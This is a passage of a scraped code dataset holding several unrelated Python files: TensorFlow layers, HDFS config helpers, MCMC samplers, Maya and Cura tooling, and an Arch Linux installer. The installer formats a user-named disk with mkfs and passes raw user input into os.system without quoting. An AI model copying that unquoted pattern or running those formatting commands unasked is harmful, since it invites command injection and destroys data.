Weights and bias\n s = [int(x_tensor.shape[1]), num_outputs]\n W = tf.Variable(tf.truncated_normal(s , stddev=.05))\n # The fully connected layer\n x = tf.matmul(x_tensor, W, name=name)\n return x\n\ndef output(x_tensor, num_outputs):\n with tf.name_scope('fully_conn'):\n # Weights and bias\n W = tf.Variable(tf.truncated_normal([int(x_tensor.shape[1]), num_outputs], stddev=.05))\n b = tf.Variable(tf.zeros([num_outputs]))\n\n # The output layer\n x = tf.add(tf.matmul(x_tensor, W), b)\n x = tf.nn.softmax(x)\n return x\n","repo_name":"embedded-machine-learning/annette","sub_path":"src/annette/benchmark/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":12593,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"6217114897","text":"import json\nfrom copy import deepcopy\n\nfrom dataflow.batch.handlers.processing_batch_info import ProcessingBatchInfoHandler\nfrom dataflow.batch.handlers.processing_job_info import ProcessingJobInfoHandler\nfrom dataflow.shared.log import batch_logger\nfrom dataflow.shared.meta.processing.data_processing_helper import DataProcessingHelper\nfrom dataflow.shared.meta.result_table.result_table_helper import ResultTableHelper\nfrom dataflow.shared.storekit.storekit_helper import StorekitHelper\n\n\ndef parse_hdfs_params(rt_id):\n storage_response = ResultTableHelper.get_result_table_storage(rt_id, \"hdfs\")\n batch_logger.info(\"Try to get %s hdfs storages\" % rt_id)\n batch_logger.info(storage_response)\n return build_hdfs_params(rt_id, storage_response)\n\n\ndef build_hdfs_params(rt_id, meta_storage_response):\n storage_params = {}\n storage_connection_info = json.loads(meta_storage_response[\"hdfs\"][\"storage_cluster\"][\"connection_info\"])\n storage_params[\"physical_table_name\"] = meta_storage_response[\"hdfs\"][\"physical_table_name\"]\n storage_params[\"cluster_name\"] = meta_storage_response[\"hdfs\"][\"storage_cluster\"][\"cluster_name\"]\n storage_params[\"cluster_group\"] = meta_storage_response[\"hdfs\"][\"storage_cluster\"][\"cluster_group\"]\n storage_params[\"name_service\"] = storage_connection_info[\"hdfs_url\"]\n storage_params[\"data_type\"] = meta_storage_response[\"hdfs\"][\"data_type\"]\n if (\n meta_storage_response[\"hdfs\"][\"data_type\"] is not None\n and str(meta_storage_response[\"hdfs\"][\"data_type\"]).lower() == \"iceberg\"\n ):\n storage_params[\"storekit_hdfs_conf\"] = StorekitHelper.get_hdfs_conf(rt_id)\n return storage_params\n\n\ndef parse_ignite_params(rt_id):\n storage_response = ResultTableHelper.get_result_table_storage(rt_id, \"ignite\")\n batch_logger.info(\"Try to get %s ignite storages\" % rt_id)\n batch_logger.info(storage_response)\n storage_params = json.loads(storage_response[\"ignite\"][\"storage_cluster\"][\"connection_info\"])\n storage_params[\"physical_table_name\"] = storage_response[\"ignite\"][\"physical_table_name\"]\n return storage_params\n\n\ndef parse_source_fields(rt_id):\n fields_response = ResultTableHelper.get_result_table_fields(rt_id)\n batch_logger.info(\"Try to get %s fields\" % rt_id)\n batch_logger.info(fields_response)\n fields = []\n for field_response in fields_response:\n if field_response[\"field_name\"] != \"timestamp\" and field_response[\"field_name\"] != \"offset\":\n field = {\n \"field\": field_response[\"field_name\"],\n \"type\": field_response[\"field_type\"],\n \"origin\": rt_id,\n \"description\": field_response[\"field_name\"],\n }\n fields.append(field)\n return fields\n\n\ndef is_model_serve_mode_offline(processing_id):\n return DataProcessingHelper.is_model_serve_mode_offline(processing_id)\n\n\n# deprecated\ndef get_rt_job_submit_args_from_db(parent_rt_id):\n parent_job_info = ProcessingJobInfoHandler.get_proc_job_info(parent_rt_id)\n if parent_job_info.job_config is not None:\n job_config = json.loads(parent_job_info.job_config)\n if \"submit_args\" in job_config:\n parent_submit_args = json.loads(job_config[\"submit_args\"])\n if \"schedule_period\" in parent_submit_args:\n return parent_submit_args\n batch_info = ProcessingBatchInfoHandler.get_proc_batch_info_by_batch_id(parent_rt_id)\n return json.loads(batch_info.submit_args)\n\n\n# deprecated\ndef query_rt_period(parent_rt_id):\n job_info = ProcessingBatchInfoHandler.get_proc_batch_info_by_batch_id(parent_rt_id)\n return job_info.schedule_period\n\n\n# deprecated\ndef get_batch_min_window_size(submit_args, result_table_id):\n if submit_args[\"accumulate\"]:\n return 1, \"hour\"\n\n parent_windows = []\n unit = \"hour\"\n parent_result_tables = deepcopy(submit_args[\"result_tables\"])\n\n is_self_dependency = False\n if \"advanced\" in submit_args and \"self_dependency\" in submit_args[\"advanced\"]:\n is_self_dependency = submit_args[\"advanced\"][\"self_dependency\"]\n\n if is_self_dependency:\n parent_result_tables[result_table_id] = {}\n parent_result_tables[result_table_id][\"window_size\"] = submit_args[\"count_freq\"]\n parent_result_tables[result_table_id][\"window_delay\"] = submit_args[\"count_freq\"]\n parent_result_tables[result_table_id][\"window_size_period\"] = submit_args[\"schedule_period\"]\n\n for rt in parent_result_tables:\n window_size = int(parent_result_tables[rt][\"window_size\"])\n if parent_result_tables[rt][\"window_size_period\"] == \"day\":\n window_size = window_size * 24\n elif parent_result_tables[rt][\"window_size_period\"] == \"week\":\n window_size = window_size * 24 * 7\n elif parent_result_tables[rt][\"window_size_period\"] == \"month\":\n unit = \"month\"\n parent_windows.append(window_size)\n\n # 静态关联没有窗口,但是需要支持直连ignite,当直连ignite而没有其他hdfs表时,默认窗口为当前周期\n if len(parent_windows) == 0 and \"static_data\" in submit_args and len(submit_args[\"static_data\"]) > 0:\n window_size = int(submit_args[\"count_freq\"])\n if submit_args[\"schedule_period\"] == \"day\":\n window_size = window_size * 24\n elif submit_args[\"schedule_period\"] == \"week\":\n window_size = window_size * 24 * 7\n elif submit_args[\"schedule_period\"] == \"month\":\n unit = \"month\"\n parent_windows.append(window_size)\n return min(parent_windows), unit\n","repo_name":"Tencent/bk-base","sub_path":"src/api/dataflow/batch/utils/result_table_util.py","file_name":"result_table_util.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"18"} +{"seq_id":"3021289990","text":"import numpy as np\nfrom .samplers import Sampler\nfrom .._distributions import Distribution\nfrom .._distributions import Proposal\nfrom .._distributions import UniformStepProposal\n\n\n# Metropolis sampling\n#\n# Implements the Metropolis algorithm which forms a Markov Chain based on accepting ratios of probabiities\n#\n#\nclass MetropolisSampler(Sampler):\n def __init__(self, pdf: Distribution, proposal: Proposal):\n super().__init__(pdf)\n if proposal is None:\n self.proposal = UniformStepProposal(pdf.num_dimensions, pdf.support_limits)\n else:\n self.proposal = proposal\n self.ident = \"Metropolis Sampler\"\n\n def run(self, num_samples: int, params):\n initial: np.ndarray = np.asarray(params[0])\n self.last_run, self.acceptance = np.asarray(_metropolis_fast(self.distribution.probability,\n self.proposal.random_draw,\n self.distribution.num_dimensions,\n num_samples, initial))\n self.acceptance /= num_samples\n return self\n\n\ndef _metropolis_fast(pdf, proposal, ndims: int, nsamples: int, initial):\n chain = np.zeros((nsamples, ndims))\n chain_x = initial\n accept: int = 0\n # Reduce the number of calls to pdf by calculating now and only if we move (~ 20% speedup)\n old_p = pdf(chain_x) # speedup 2\n # Trade some memory for speed (~15/20%, possible proportional to acceptance ratio)\n rand_u = np.random.uniform(0.0, 1.0, nsamples) # speedup 1\n for i in range(nsamples):\n # Get new data\n new_x = proposal(chain_x)\n new_p = pdf(new_x)\n if new_p > 0.0:\n # Only progress the chain if the proposal is valid\n if old_p > 0.0:\n acceptance = new_p / old_p\n else:\n # if the old point was out of bounds, then accept new point\n acceptance = 1.0\n if rand_u[i] < acceptance:\n chain_x = new_x\n old_p = new_p # Only call if we move, speedup 3: assign instead (7%)\n accept += 1\n chain[i] = chain_x\n return chain, accept\n\n\n# Some pre-baked proposals for metropolis samplers (faster batching)\n#\n# Uniform random walking\n#\ndef _metropolis_uniform(pdf, step, ndims: int, nsamples: int, initial):\n chain = np.zeros((nsamples, ndims))\n chain_x = initial\n accept: int = 0\n walks = np.multiply(np.random.uniform(-1.0, 1.0, (nsamples, ndims)), step)\n old_p = pdf(chain_x)\n rand_u = np.random.uniform(0.0, 1.0, nsamples)\n for i in range(nsamples):\n # Get new data\n new_x = chain_x + walks[i]\n new_p = pdf(new_x)\n if new_p > 0.0:\n # Only progress the chain if the proposal is valid\n if old_p > 0.0:\n acceptance = new_p / old_p\n else:\n # if the old point was out of bounds, then accept new point\n acceptance = 1.0\n if rand_u[i] < acceptance:\n chain_x = new_x\n old_p = new_p\n accept += 1\n chain[i] = chain_x\n return chain, accept\n\n\n# Uniform random walker with unequal step sizes per dimension\ndef _metropolis_uniform_multi(pdf, mins, maxs, ndims: int, nsamples: int, initial):\n chain = np.zeros((nsamples, ndims))\n chain_x = initial\n accept: int = 0\n walks = np.asarray([np.random.uniform(low=mins[i], high=maxs[i], size=nsamples)\n for i in range(ndims)]).transpose().squeeze()\n old_p = pdf(chain_x)\n rand_u = np.random.uniform(0.0, 1.0, nsamples)\n for i in range(nsamples):\n # Get new data\n new_x = chain_x + walks[i]\n new_p = pdf(new_x)\n if new_p > 0.0:\n # Only progress the chain if the proposal is valid\n if old_p > 0.0:\n acceptance = new_p / old_p\n else:\n # if the old point was out of bounds, then accept new point\n acceptance = 1.0\n if rand_u[i] < acceptance:\n chain_x = new_x\n old_p = new_p\n accept += 1\n chain[i] = chain_x\n return chain, accept\n","repo_name":"fentonscode/xEHM","sub_path":"src/xehm/sampling/metropolis_sampler.py","file_name":"metropolis_sampler.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33063581136","text":"seq_len=int(input(\"Enter the sequence length : \"))\r\na=0;b=1;c=a+b;\r\nprint(a,end=\",\")\r\nprint(b,end=\",\")\r\nfor i in range(seq_len-2):\r\n if i!=seq_len-3:\r\n print(c,end=\",\")\r\n else :\r\n print(c,end=\"\")\r\n a=b\r\n b=c\r\n c=a+b\r\n","repo_name":"AmitabhKotha/MyCaptainPython","sub_path":"fibonnaciIteration.py","file_name":"fibonnaciIteration.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"118809574","text":"\"\"\"\nMerge files that are devided out by range number into a single file.\n\nAuthor: Hayden Elza\nEmail: hayden.elza@gmail.com\nCreated: 2019-07-26\n\"\"\"\n\n\nimport os\n\n\n# Data Sources\nwd = os.path.dirname(os.getcwd())\nwest = os.path.join(wd, 'data/edited/TownshipsWest/')\neast = os.path.join(wd, 'data/edited/TownshipsEast/')\nsources = [west,east]\n\noutput = os.path.join(wd, 'data/edited/township_descriptions.txt')\n\n# Open output\nwith open(output, 'w') as outfile:\n\n\t# Iterate through sources\n\tfor source in sources:\n\n\t\t# Walk directory\n\t\tfor dir_name, subdirs, files in os.walk(source):\n\t\t\tprint('Found directory: %s' % dir_name)\n\n\t\t\t# Read each line for each file and write to output file\n\t\t\tfor file in files:\n\t\t\t\tprint('\\t%s' % file)\n\t\t\t\twith open(os.path.join(dir_name, file)) as infile:\n\t\t\t\t\tfor line in infile:\n\t\t\t\t\t\toutfile.write(line)\n","repo_name":"mdnoone/PLSS","sub_path":"scripts/1_merge_files.py","file_name":"1_merge_files.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20650759221","text":"# -- Sarch installr\n# -- WARNING: Works only for x64 EFI based systems.\n\nimport os\n\nkeymap = \"\"\ninstall_disk = \"\"\n\ndef InternetCheck():\n response = os.system(\"ping -c 1 google.com > /dev/null\")\n if response == 0: return 1\n else: return 0\n\ndef launch_cfdisk():\n os.system(\"cfdisk \" + install_disk)\n if (input(\"Did you partition your disks correctly? (Y/n)\") == \"n\"):\n launch_cfdisk()\n\ndef format_mount_disks():\n # Prepare partitions for mounting\n os.system(\"mkfs.fat -F32 \" + install_disk + \"1\")\n os.system(\"mkswap \" + install_disk + \"2\")\n os.system(\"mkfs.ext4 \" + install_disk + \"3\")\n\n # Mount all partition aside from /dev/sd*1\n os.system(\"mount \" + install_disk + \"3 /mnt\")\n os.system(\"swapon \" + install_disk + \"2\")\n\n# -- Entry point\n\nprint(\"--- WARNING: This installer will only work with x64 EFI based systems\")\n\nif (InternetCheck() != 1):\n print(\"Installation Failed: You're not connected to internet!\")\n quit()\n\nkeymap = input(\"Enter your keymap: \")\nos.system(\"loadkeys \" + keymap)\nos.system(\"timedatectl set-ntp true\")\nos.system(\"lsblk\")\ninstall_disk = input(\"Enter the disk you want to install Sarch to: \")\ninput(\"Press any key to launch cfdisk on: \" + install_disk)\nlaunch_cfdisk()\nformat_mount_disks()\nos.system(\"pacstrap /mnt base linux linux-firmware nano git python3\") # install linux base system\nos.system(\"cp install_stage_2.py /mnt/stage_2.py\")\nos.system(\"genfstab -U /mnt >> /mnt/etc/fstab && clear\")\nprint(\"WARNING: You are now chrooted into the new mount point, run 'python3 stage_2.py'\")\nos.system(\"arch-chroot /mnt\")\n","repo_name":"MrG98XIL/Arch-Installer-Test","sub_path":"install_stage_1.py","file_name":"install_stage_1.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26784491750","text":"import configparser #To parse preference files.\nimport io #To serialise the preference files afterwards.\nfrom typing import Dict, List, Tuple\n\nfrom UM.VersionUpgrade import VersionUpgrade #We're inheriting from this.\n\n_renamed_settings = {\n \"infill_hollow\": \"infill_support_enabled\"\n} # type: Dict[str, str]\n\n## Upgrades configurations from the state they were in at version 3.3 to the\n# state they should be in at version 3.4.\nclass VersionUpgrade33to34(VersionUpgrade):\n ## Gets the version number from a CFG file in Uranium's 3.3 format.\n #\n # Since the format may change, this is implemented for the 3.3 format only\n # and needs to be included in the version upgrade system rather than\n # globally in Uranium.\n #\n # \\param serialised The serialised form of a CFG file.\n # \\return The version number stored in the CFG file.\n # \\raises ValueError The format of the version number in the file is\n # incorrect.\n # \\raises KeyError The format of the file is incorrect.\n def getCfgVersion(self, serialised: str) -> int:\n parser = configparser.ConfigParser(interpolation = None)\n parser.read_string(serialised)\n format_version = int(parser.get(\"general\", \"version\")) #Explicitly give an exception when this fails. That means that the file format is not recognised.\n setting_version = int(parser.get(\"metadata\", \"setting_version\", fallback = \"0\"))\n return format_version * 1000000 + setting_version\n\n ## Upgrades instance containers to have the new version\n # number.\n def upgradeInstanceContainer(self, serialized: str, filename: str) -> Tuple[List[str], List[str]]:\n parser = configparser.ConfigParser(interpolation = None)\n parser.read_string(serialized)\n\n # Update version number.\n parser[\"general\"][\"version\"] = \"4\"\n\n if \"values\" in parser:\n #If infill_hollow was enabled and the overhang angle was adjusted, copy that overhang angle to the new infill support angle.\n if \"infill_hollow\" in parser[\"values\"] and parser[\"values\"][\"infill_hollow\"] and \"support_angle\" in parser[\"values\"]:\n parser[\"values\"][\"infill_support_angle\"] = parser[\"values\"][\"support_angle\"]\n\n #Renamed settings.\n for original, replacement in _renamed_settings.items():\n if original in parser[\"values\"]:\n parser[\"values\"][replacement] = parser[\"values\"][original]\n del parser[\"values\"][original]\n\n result = io.StringIO()\n parser.write(result)\n return [filename], [result.getvalue()]","repo_name":"Szu-Chi/3d-printing-with-moveo","sub_path":"Cura/Cura/plugins/VersionUpgrade/VersionUpgrade33to34/VersionUpgrade33to34.py","file_name":"VersionUpgrade33to34.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"73087977320","text":"from tkinter import *\nfrom threading import Thread\n\nfrom .home import Home\n\n\nclass InitUi(Thread):\n def __init__(self, messages):\n Thread.__init__(self)\n self.root = Tk()\n self.root.title(\"All is found\")\n self.frame1 = Frame()\n self.frame1.pack(side=LEFT, fill=Y)\n self.frame1.config(bg=\"skyblue\")\n self.home = Home(self.frame1, messages)\n self.refresh_message = self.home.refresh_message\n\n def run(self):\n self.root.mainloop()\n","repo_name":"karnkittik/all-is-found","sub_path":"front_end/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1306328835","text":"import pymel.core as pm\nimport os\nfrom functools import partial\n\nimport System.utils as utils\n\nreload(utils)\n\nclass Blueprint_UI:\n \n def __init__(self):\n \n self.directory = '%s/nwModularRiggingTool' %pm.internalVar(userScriptDir = True)\n self.moduleInstance = None\n \n self.DeleteSymmetryMoveExpressions()\n \n # Store UI elements in a dictionary\n self.UIElements = {}\n \n # Refresh all UI\n if pm.window(\"blueprint_UI_window\", exists = True):\n pm.deleteUI(\"blueprint_UI_window\")\n\n if pm.window(\"mirrorModule_UI_window\", exists = True):\n pm.deleteUI(\"mirrorModule_UI_window\")\n \n if pm.window(\"groupSelected_UI_window\", exists = True):\n pm.deleteUI(\"groupSelected_UI_window\")\n \n if pm.window(\"saveTemplate_UI_window\", exists = True):\n pm.deleteUI(\"saveTemplate_UI_window\")\n \n \n \n windowWidth = 400\n windowHeight = 748\n \n self.UIElements[\"window\"] = pm.window(\"blueprint_UI_window\", width = windowWidth, height = windowHeight, title = \"Blueprint Modue UI\", sizeable = False)\n \n self.UIElements[\"topLevelColumn\"] = pm.columnLayout(adjustableColumn = True, columnAlign = \"center\", parent = self.UIElements[\"window\"])\n \n # Setup tab\n tabHeight = 630\n self.UIElements[\"tabs\"] = pm.tabLayout(width = windowWidth, height = tabHeight, innerMarginWidth = 5, innerMarginHeight = 5, parent = self.UIElements[\"topLevelColumn\"])\n \n tabWidth = pm.tabLayout(self.UIElements[\"tabs\"], query = True, width = True)\n self.scrollWidth = tabWidth - 40\n \n self.InitializeModuleTab(tabWidth, tabHeight)\n \n # Template tab\n self.InitializeTemplatesTab(tabHeight, tabWidth)\n \n \n # Controls tab\n self.InitializeControlsTab(tabHeight, tabWidth)\n \n \n scenePublished = pm.objExists(\"Scene_Published\")\n blueprintsUnlocked = not pm.objExists(\"Blueprints_Locked\") and not scenePublished\n controlsUnlocked = not blueprintsUnlocked and not pm.objExists(\"Controls_Locked\")\n \n \n \n pm.tabLayout(self.UIElements[\"tabs\"], edit = True, tabLabelIndex = ([1, 'Modules'], [2, 'Templates'], [3, 'Controls']), enable = blueprintsUnlocked )\n \n \n self.UIElements[\"lockPublishColumn\"] = pm.columnLayout(adjustableColumn = True, columnAlign = 'center', rowSpacing = 3, parent = self.UIElements[\"topLevelColumn\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"lockPublishColumn\"])\n \n self.UIElements[\"lockBtn_rowLayout\"] = pm.rowLayout(numberOfColumns = 2, parent = self.UIElements[\"lockPublishColumn\"])\n \n self.UIElements[\"lockBlueprintsBtn\"] = pm.iconTextButton(style='iconOnly', image = \"%s/Icons/_lockBlueprints.png\" %os.environ[\"RIGGING_TOOL_ROOT\"], enable = blueprintsUnlocked, command = self.LockBlueprint, parent = self.UIElements[\"lockBtn_rowLayout\"])\n self.UIElements[\"lockControlsBtn\"] = pm.iconTextButton(style='iconOnly', image = \"%s/Icons/_lockControls.png\" %os.environ[\"RIGGING_TOOL_ROOT\"], enable = controlsUnlocked, command = self.LockControls, parent = self.UIElements[\"lockBtn_rowLayout\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"lockPublishColumn\"])\n \n self.UIElements[\"publishBtn\"] = pm.iconTextButton(style='iconOnly', image = \"%s/Icons/_publishCharacter.png\" %os.environ[\"RIGGING_TOOL_ROOT\"], enable = not blueprintsUnlocked and not controlsUnlocked and not scenePublished, command = self.Publish, parent = self.UIElements[\"lockPublishColumn\"])\n \n \n \n # Display window\n pm.showWindow(self.UIElements[\"window\"])\n \n \n self.CreateScriptJob()\n \n \n \n def CreateScriptJob(self):\n self.jobNum = pm.scriptJob(event = [\"SelectionChanged\", self.ModifySelected], runOnce = True, parent = self.UIElements[\"window\"])\n \n \n \n def DeleteScriptJob(self):\n pm.scriptJob(kill = self.jobNum)\n \n \n def InitializeModuleTab(self, _tabWidth, _tabHeight):\n \n moduleSpecific_scrollHeight = 170\n scrollHeight = _tabHeight - moduleSpecific_scrollHeight - 163\n \n \n self.UIElements[\"moduleColumn\"] = pm.columnLayout(adjustableColumn = True, rowSpacing = 3, parent = self.UIElements[\"tabs\"])\n \n self.UIElements[\"moduleFrameLayout\"] = pm.frameLayout(height = scrollHeight, collapsable = False, borderVisible = False, labelVisible = False, parent = self.UIElements[\"moduleColumn\"])\n \n self.UIElements[\"moduleList_scroll\"] = pm.scrollLayout(horizontalScrollBarThickness = 0, parent = self.UIElements[\"moduleFrameLayout\"])\n \n self.UIElements[\"moduleList_column\"] = pm.columnLayout(columnWidth = self.scrollWidth, adjustableColumn = True, rowSpacing = 2, parent = self.UIElements[\"moduleList_scroll\"])\n \n \n # first separator\n pm.separator(style = 'in', parent = self.UIElements[\"moduleList_column\"])\n \n # Module buttons\n for module in utils.FindAllModules(\"Modules/Blueprint\"):\n self.CreateModuleInstallButton(module)\n pm.separator(style = 'in', parent = self.UIElements[\"moduleList_column\"])\n \n \n # Module manipulation buttons\n pm.separator(style = 'in', parent = self.UIElements[\"moduleColumn\"])\n \n self.UIElements[\"moduleName_row\"] = pm.rowLayout(numberOfColumns = 2, columnAttach = (1, 'right', 0), columnWidth = [(1, 80)], adjustableColumn = 2, parent = self.UIElements[\"moduleColumn\"])\n pm.text(label = \"Module Name :\", parent = self.UIElements[\"moduleName_row\"])\n self.UIElements[\"moduleName\"] = pm.textField(enable = False, alwaysInvokeEnterCommandOnReturn = True, parent = self.UIElements[\"moduleName_row\"], enterCommand = self.RenameModule)\n \n \n columnWidth = (_tabWidth - 20) / 3\n \n self.UIElements[\"moduleButtons_rowColumns\"] = pm.rowColumnLayout(numberOfColumns = 3, rowOffset = [(1, 'both', 2), (2, 'both', 2), (3, 'both', 2)], columnAttach = [(1, 'both', 3), (2, 'both', 3), (3, 'both', 3)], columnWidth = [(1, columnWidth), (2, columnWidth), (3, columnWidth)], parent = self.UIElements[\"moduleColumn\"])\n \n # First row of buttons\n self.UIElements[\"rehookBtn\"] = pm.button(enable = False, label = \"Re-hook\", command = self.RehookModule_setup, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n self.UIElements[\"snapRootBtn\"] = pm.button(enable = False, label = \"Snap Root > Hook\", command = self.SnapRootToHook, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n self.UIElements[\"constrainBtn\"] = pm.button(enable = False, label = \"Constrain Root > Hook\", command = self.ConstrainRootToHook, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n \n # Second row of buttons\n self.UIElements[\"groupSelectedBtn\"] = pm.button(label = \"Group Selected\", command = self.GroupSelected, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n self.UIElements[\"ungroupBtn\"] = pm.button(enable = False, label = \"Ungroup\", command = self.UngroupSelected, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n self.UIElements[\"mirrorModuleBtn\"] = pm.button(enable = False, label = \"Mirror Module\", command = self.MirrorModule, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n \n # Third row of buttons\n self.UIElements[\"duplicateModuleBtn\"] = pm.button(enable = True, label = \"Duplicate Module\", command = self.DuplicateModule, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n self.UIElements[\"deleteModuleBtn\"] = pm.button(enable = False, label = \"Delete Module\", command = self.DeleteModule, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n self.UIElements[\"symmetryMoveCheckBox\"] = pm.checkBox(enable = True, label = \"Symmetry Move\", onCommand = self.SetupSymmetryMoveExpressions_CheckBox, offCommand = self.DeleteSymmetryMoveExpressions, parent = self.UIElements[\"moduleButtons_rowColumns\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"moduleColumn\"])\n \n \n \n self.UIElements[\"moduleSpecificRowColumnLayout\"] = pm.rowColumnLayout(numberOfRows = 1, rowAttach = [1, 'both', 0], rowHeight = [1, moduleSpecific_scrollHeight], parent = self.UIElements[\"moduleColumn\"])\n self.UIElements[\"modueSpecific_scroll\"] = pm.scrollLayout(width = _tabWidth - 8, horizontalScrollBarThickness = 0, parent = self.UIElements[\"moduleSpecificRowColumnLayout\"])\n self.UIElements[\"moduleSpecific_column\"] = pm.columnLayout(columnWidth = self.scrollWidth, columnAttach = ['both', 5], rowSpacing = 2, parent = self.UIElements[\"modueSpecific_scroll\"])\n \n \n pm.separator(style = 'in', parent = self.UIElements[\"moduleColumn\"])\n \n \n def InitializeTemplatesTab(self, _tabHeight, _tabWidth):\n \n self.UIElements[\"templatesColumn\"] = pm.columnLayout(adjustableColumn = True, rowSpacing = 3, columnAttach = [\"both\", 0], parent = self.UIElements[\"tabs\"])\n \n self.UIElements[\"templatesFrame\"] = pm.frameLayout(height = (_tabHeight - 104), collapsable = False, borderVisible = False, labelVisible = False, parent = self.UIElements[\"templatesColumn\"])\n self.UIElements[\"templateList_scroll\"] = pm.scrollLayout(horizontalScrollBarThickness = 0, parent = self.UIElements[\"templatesFrame\"])\n self.UIElements[\"templateList_column\"] = pm.columnLayout(adjustableColumn = True, rowSpacing = 2, parent = self.UIElements[\"templateList_scroll\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"templateList_column\"])\n \n for template in utils.FindAllMayaFiles(\"/Templates\"):\n \n #templateAndPath = \"%s/Templates/%s.ma\" %(self.directory, template)\n templateAndPath = \"%s/Templates/%s.ma\" %(os.environ[\"RIGGING_TOOL_ROOT\"], template)\n self.CreateTemplateInstallButton(templateAndPath)\n \n \n pm.separator(style = 'in', parent = self.UIElements[\"templatesColumn\"])\n \n self.UIElements[\"prepareTemplateBtn\"] = pm.button(label = \"Prepare for Template\", command = self.PrepareForTemplate, parent = self.UIElements[\"templatesColumn\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"templatesColumn\"])\n \n self.UIElements[\"saveCurrentBtn\"] = pm.button(label = \"Save Current as Template\", command = self.SaveCurrentAsTemplate, parent = self.UIElements[\"templatesColumn\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"templatesColumn\"])\n \n \n def InitializeControlsTab(self, _tabHeight, _tabWidth):\n \n self.UIElements[\"controlsColumn\"] = pm.columnLayout(adjustableColumn = True, rowSpacing = 3, columnAttach = [\"both\", 0], parent = self.UIElements[\"tabs\"])\n \n self.UIElements[\"controlsFrame\"] = pm.frameLayout(height = (_tabHeight - 104), collapsable = False, borderVisible = False, labelVisible = False, parent = self.UIElements[\"controlsColumn\"])\n self.UIElements[\"controlsList_scroll\"] = pm.scrollLayout(horizontalScrollBarThickness = 0, parent = self.UIElements[\"controlsFrame\"])\n self.UIElements[\"controlsList_column\"] = pm.columnLayout(adjustableColumn = True, rowSpacing = 2, parent = self.UIElements[\"controlsList_scroll\"])\n \n pm.separator(style = 'in', parent = self.UIElements[\"controlsList_column\"])\n \n self.UIElements[\"controlsTextScrollList\"] = pm.textScrollList(parent = self.UIElements[\"controlsList_column\"])\n \n \n def CreateModuleInstallButton(self, _module):\n \n mod = __import__(\"Blueprint.%s\" %_module, (), (), [_module])\n reload(mod)\n \n title = mod.TITLE\n description = mod.DESCRIPTION\n icon = mod.ICON\n \n # Create UI\n buttonSize = 64\n row = pm.rowLayout(numberOfColumns = 2, columnWidth = ([1, buttonSize]), adjustableColumn = 2, columnAttach = ([1, 'both', 0], [2, 'both', 5]), parent = self.UIElements[\"moduleList_column\"])\n \n self.UIElements[\"module_button_%s\" %_module] = pm.symbolButton(width = buttonSize, height = buttonSize, image = icon, command = partial(self.InstallModule, _module), parent = row)\n \n textColumn = pm.columnLayout(columnAlign = \"center\", rowSpacing = 5, parent = row)\n pm.text(align = \"center\", width = self.scrollWidth - buttonSize - 16, label = title, parent = textColumn)\n \n pm.scrollField(text = description, editable = False, width = self.scrollWidth - buttonSize - 16, height = buttonSize - 16, wordWrap = True, parent = textColumn)\n \n \n def CreateTemplateInstallButton(self, _templateAndPath):\n buttonSize = 64\n \n templateDescriptionFile = \"%s.txt\" %_templateAndPath.partition(\".ma\")[0]\n \n with open(templateDescriptionFile, 'r') as file:\n \n title = file.readline()[0:-1]\n description = file.readline()[0:-1]\n icon = file.readline()[0:-1]\n \n row = pm.rowLayout(width = self.scrollWidth, numberOfColumns = 2, columnWidth = ([1, buttonSize], [2, self.scrollWidth - buttonSize]), adjustableColumn = 2, columnAttach = ([1, \"both\", 0], [2, \"both\", 5]), parent = self.UIElements[\"templateList_column\"])\n self.UIElements[\"templat_button_%s\" %_templateAndPath] = pm.symbolButton(width = buttonSize, height = buttonSize, image = icon, command = partial(self.InstallTemplate, _templateAndPath), parent = row)\n \n textColumn = pm.columnLayout(columnAlign = \"center\", parent = row)\n pm.text(align = \"center\", width = self.scrollWidth - buttonSize - 16, label = title, parent = textColumn)\n pm.scrollField(text = description, editable = False, width = self.scrollWidth - buttonSize - 16, height = buttonSize - 16, wordWrap = True, parent = textColumn)\n \n pm.separator(style = \"in\", parent = self.UIElements[\"templateList_column\"])\n \n \n def InstallModule(self, _module, *args):\n \n basename = \"instance_\"\n \n # Set namespace to root and list all namespaces in scene\n pm.namespace(setNamespace = ':')\n namespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n \n # Find our module namespace\n for i in range(len(namespaces)):\n if namespaces[i].find(\"__\") != -1:\n namespaces[i] = namespaces[i].rpartition(\"__\")[2]\n \n \n newSuffix = utils.FindHighestTrailingNumber(namespaces, basename) + 1\n \n userSpecName = basename + str(newSuffix)\n \n \n hookObj = self.FindHookObjectFromSelection()\n \n \n # Import our module\n mod = __import__(\"Blueprint.%s\" %_module, (), (), [_module])\n reload(mod)\n \n moduleClass = getattr(mod, mod.CLASS_NAME)\n moduleInstance = moduleClass(userSpecName, hookObj)\n 